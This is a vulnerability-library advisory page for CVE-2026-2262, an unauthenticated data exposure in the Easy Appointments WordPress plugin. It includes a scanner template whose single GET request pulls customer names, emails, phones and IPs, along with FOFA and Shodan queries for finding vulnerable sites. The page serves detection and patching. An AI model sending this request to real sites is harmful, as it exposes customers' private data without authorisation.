/Vulnerability Library

Easy Appointments <= 3.12.21 - Unauthenticated Sensitive Information Exposure

CVE-2026-2262
Early Release

Description

Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data.

Severity

High

CVSS Score

7.5

Published Date

April 21, 2026

Template Author

0x_akoko

CVE-2026-2262.yaml
id: CVE-2026-2262

info:
  name: Easy Appointments <= 3.12.21 - Unauthenticated Sensitive Information Exposure
  author: 0x_Akoko
  severity: high
  description: |
   Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data.
  impact: |
   Unauthenticated attackers can access sensitive customer data including names, emails, phone numbers, IPs, descriptions, and pricing, risking privacy and data leakage.
  remediation: |
   Update to the latest version of Easy Appointments plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments/easy-appointments-31221-unauthenticated-sensitive-information-exposure-via-rest-api
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2262
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2262
    cwe-id: CWE-284
    cpe: cpe:2.3:a:motopress:easy_appointments:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/easy-appointments/"
    shodan-query: http.html:"/wp-content/plugins/easy-appointments/"
  tags: cve,cve2026,wordpress,wp-plugin,exposure,unauth

http:
  - raw:
      - |
        GET /wp-json/wp/v2/eablocks/ea_appointments/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'email', 'phone', 'ip', 'name')"
        condition: and
# digest: 4a0a00473045022063039bcdab92495627de9f8546a6c0779ca5a86ac590911b67e2c7308ee85db9022100c47ac890402e60d49b9eac77e15efdac6b92e11ee093620cc31de51cf8ae35b8:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-2262
CWE ID:
cwe-284

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments/easy-appointments-31221-unauthenticated-sensitive-information-exposure-via-rest-apihttps://nvd.nist.gov/vuln/detail/CVE-2026-2262

Remediation Steps

Update to the latest version of Easy Appointments plugin.